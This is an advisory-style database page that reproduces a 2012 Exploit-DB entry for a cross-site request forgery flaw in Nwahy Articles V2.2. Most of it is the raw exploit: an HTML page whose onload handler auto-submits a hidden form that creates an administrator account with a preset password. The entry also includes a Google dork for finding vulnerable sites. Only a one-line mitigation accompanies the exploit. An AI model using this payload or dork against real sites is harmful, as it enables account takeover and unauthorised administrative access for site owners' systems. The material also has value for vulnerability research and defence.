Nwahy Articles V2.2 CSRF Add Admin

vendor:

Articles

by:

DaOne

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Articles

Affected Version From: V2.2

Affected Version To: V2.2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

Nwahy Articles V2.2 CSRF Add Admin

This exploit allows an attacker to add an admin user to the Nwahy Articles V2.2 web application. The attacker can craft a malicious HTML page that contains a form with hidden fields that contain the username, password, email, site, name, and group type of the admin user. When the victim visits the malicious page, the form is automatically submitted and the admin user is added to the application.

Mitigation:

Implementing CSRF protection mechanisms such as synchronizer tokens, or using a web application firewall to detect and block malicious requests.

Source

Exploit-DB raw data:

##########################################
[~] Exploit Title: Nwahy Articles V2.2 CSRF Add Admin
[~] Author: DaOne
[~] Date: 18-7-2012
[~] Category: webapps
[~] Software Link: http://www.nwahy.com/upload/article-v2.2.rar
[~] Google dork: intext:"Powered by Nwahy Articles V2.2"
##########################################

[#] ~[ Exploit ]~

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://localhost/admincp/user.php?action=insert">
<input type="hidden" name="username" value="webadmin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="email" value="admin@admin.com"/>
<input type="hidden" name="site" value="http://www.nwahy.com"/>
<input type="hidden" name="name" value="..."/>
<input type="hidden" name="groubtype" value="1"/>
</form>
</body>
</html>

##########################################